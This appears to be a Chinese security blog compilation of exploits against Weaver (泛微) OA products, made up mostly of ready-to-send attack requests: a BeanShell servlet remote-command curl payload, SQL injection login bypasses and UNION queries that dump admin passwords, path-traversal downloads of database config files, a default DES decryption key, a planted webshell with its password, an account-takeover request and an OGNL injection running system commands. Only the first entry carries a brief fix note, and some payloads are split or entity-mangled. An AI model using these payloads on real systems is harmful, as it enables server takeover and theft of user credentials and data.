0x01 漏洞描述泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。
0x02 漏洞危害
攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。
0x03 影响范围
泛微 e-cology<&#61;9.0
0x04 漏洞复现
访问 http://url/weaver/bsh.servlet.BshServlet 输入 payload 如下:
0x05 poc
漏洞路径:/weaver/bsh.servlet.BshServlet
exec("whoami")
curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d &#39;bsh.script&#61;ev
al%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr&#61;true&bsh.servlet.outp ut&#61;raw&#39;
0x06修复方案
1、屏蔽/weaver/*目录的访问&#xff1b;
2、https://www.weaver.com.cn/cs/securityDownload.asp
泛微OA系统在数据库配置信息泄露
0x01 漏洞描述
攻击者可通过该漏洞页面直接获取到数据库配置信息&#xff0c;攻击者可通过访问存在漏洞的页面并解密从而获取数据库配置信息&#xff0c;如攻击者可直接访问数据库&#xff0c;则可直接获取用户数据&#xff0c;由于泛微e-cology默认数据库大多为MSSQL数据库,结合XPCMDSHELL将可直接控制数据库服务器.
0x02 影响范围
目前已知为8.100.0531,不排除其他版本&#xff0c;包括不限于EC7.0、EC8.0、EC9.0版
0x03漏洞复现
对这个漏洞要注意两点就是 &#xff0c;获取密钥。默认密钥1z2x3c4v5b6n。使用密钥解密DES密文&#xff01;这里使用python脚本自动完成这一步 脚本如下&#xff1a;
SQL注入
前台SQL注入
用户名&#xff1a;
admin&#39; or password like &#39;c4ca4238a0b923820dcc509a6f75849b&#39; and &#39;a&#39;&#61;&#39;a
密码: 1
验证页面参数 - loginid
(1)
/login/VerifyLogin.jsp?loginfile&#61;%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype&#61;1&fontName&#61;%CE%A2%C8%ED%D1%C5%BA%DA&message&#61;&gopage&#61;&formmethod&#61;get&rnd&#61;&serial&#61;&username&#61;&isie&#61;false&loginid&#61;test&userpassword&#61;11111111111&tokenAuthKey&#61;&islanguid&#61;7&submit&#61;
(2)
/login/VerifyLogin.jsp?loginfile&#61;%2Flogin%2Flogin.jsp%2F%3FtemplateId%3D11%26logintype%3D1%26gopage%3D&logintype&#61;1&fontName&#61;%CE%A2%C8%ED%D1%C5%BA%DA&message&#61;&gopage&#61;&formmethod&#61;post&rnd&#61;&serial&#61;&username&#61;&isie&#61;false&loginid&#61;test&userpassword&#61;1111111111111&tokenAuthKey&#61;&islanguid&#61;7&submit&#61;
未授权访问页面
//services/ 存在注入
/ws/ 存在注入
(3)
/weaver/weaver.file.SignatureDownLoad?markId&#61;1 --参数markld
后台SQL注入
(1)
首先用使用测试账户登录&#xff0c;然后访问
http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT&#61;&CONTENT_ID&#61;123&SORT_ID&#61;166&func_id&#61;&operationType&#61;editFromRead&docStr&#61;
其中的CONTENT_ID参数能够注射SQL语句。
http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT&#61;&CONTENT_ID&#61;-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID&#61;166&func_id&#61;&operationType&#61;editFromRead&docStr&#61;
(2)
管理员情况下的注入&#xff1a;
http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id&#61;1
普通用户注入:
http://127.0.0.1//cowork/CoworkLogView.jsp?id&#61;151
普通用户注入地址&#xff1a;
http://127.0.0.1/system/basedata/basedata_role.jsp?roleid&#61;32
普通用户注入地址&#xff1a;
http://127.0.0.1//system/basedata/basedata_hrm.jsp?resourceid&#61;3
(3)
/list.do?module&#61;2&scope&#61;5#1
(4)
http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab&#61;true&id&#61;29%20and%201&#61;2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121%20from%20HrmResourceManager%20where%20loginid&#61;%27sysadmin%27&isView&#61;1
任意文件下载
测试链接 &#xff1a;
http://eoffice8.weaver.cn:8028/inc/attach.php?OP&#61;1&ATTACHMENT_NAME&#61;index.php&ATTACHMENT_ID&#61;5402024843
其中&#xff0c;参数 ATTACHMENT_NAME 未有效的控制其范围&#xff0c;导致任意文件下载
配置文件下载(程序zend加密&#xff0c;在网站http://www.showmycode.com/中可以解密)
http://xx.xx.cn:8028/inc/attach.php?OP&#61;1&ATTACHMENT_NAME&#61;../../inc/oa_config.php&ATTACHMENT_ID&#61;5402024843
数据库连接文件下载
http://xx.xx.cn:8028/inc/attach.php?OP&#61;1&ATTACHMENT_NAME&#61;../../mysql_config.ini&ATTACHMENT_ID&#61;5402024843
文件上传
http://xx.xx.cn:8028/attachment/2506423447/conf1g.php4 密码是8(system权限)
数据库后台访问
http://xx.xx.cn:8028/
phpmyadmin/
认证缺陷-绕过登录限制进入后台
则可注入的网址为
http://xx.xx.cn:8028/building/urlurl.php 直接访问显示access denied&#xff0c;
使用hackbar。post内容中,url为general/index.php&#xff0c;smsid为注入sql&#xff0c;内容为1
union select &#39;1&#39;,&#39;1&#39;,&#39;admin&#39;,&#39;1&#39;,&#39;1&#39;,&#39;1&#39;,&#39;1&#39;,&#39;1&#39;,&#39;1&#39;,&#39;1&#39;,&#39;1&#39;,&#39;1&#39;,&#39;1&#39;,&#39;1&#39;&#xff0c;两者都经过DES3加密后再经过base64转码&#xff0c;点击excute...
数据库操作
/ws/query/
泛微eteams_oa系统越权修改任意用户信息
抓包得到一个链接&#xff1a;
https://www.eteams.cn/profile/summary/8005824116863355409.json?_&#61;1408094249509
这时候我们记住8005824116863355409这个东西
我们修改本用户资料处:
我们修改一下电话&#xff0c;然后抓包并且把里面的employee.id替换为8005824116863355409为:
url:https://www.eteams.cn/base/employee/saveProperty.json
postdata:
employee.id&#61;8005824116863355409&propertyName&#61;telephone&employee.telephone&#61;test
E-Mobile 4.5 RCE
**.**.**.**/verifyLogin.do
data&#xff1a;loginid&#61;CasterJs&password&#61;CasterJs&clienttype&#61;Webclient&clientver&#61;4.5&language&#61;&country&#61;&verify&#61;${&#64;**.**.**.**.IOUtils&#64;toString(&#64;java.lang.Runtime&#64;getRuntime().exec(&#39;ipconfig&#39;).getInputStream())}
http://**.**.**.**/verifyLogin.do
data: loginid&#61;CasterJs&password&#61;CasterJs&clienttype&#61;Webclient&clientver&#61;4.5&language&#61;&country&#61;&verify&#61;${6666-2333}
http://**.**.**.**:89/verifyLogin.do
data: loginid&#61;CasterJs&password&#61;CasterJs&clienttype&#61;Webclient&clientver&#61;4.5&language&#61;&country&#61;&verify&#61;${6666-2333}
**.**.**.**/verifyLogin.do
data: loginid&#61;CasterJs&password&#61;CasterJs&clienttype&#61;Webclient&clientver&#61;4.5&language&#61;&country&#61;&verify&#61;${6666-2333}
http://**.**.**.**/verifyLogin.do
data: loginid&#61;CasterJs&password&#61;CasterJs&clienttype&#61;Webclient&clientver&#61;4.5&language&#61;&country&#61;&verify&#61;${6666-2333}
http://**.**.**.**/verifyLogin.do
data: loginid&#61;CasterJs&password&#61;CasterJs&clienttype&#61;Webclient&clientver&#61;4.5&language&#61;&country&#61;&verify&#61;${6666-2333}
敏感文件泄露
/messager/users.data
/plugin/ewe/jsp/config.jsp
路径遍历
/plugin/ewe/admin/upload.jsp?id&#61;11&dir&#61;../../../
/weaver/weaver.file.SignatureDownLoad?markId&#61;1&#43;union&#43;select&#43;&#39;../ecology/WEB-INF/prop/weaver.properties&#39;
推荐文章&#43;&#43;&#43;&#43;
*通达OA 漏洞预警
*Apache Struts爆最新漏洞
*PHP环境 XML外部实体注入漏洞(XXE)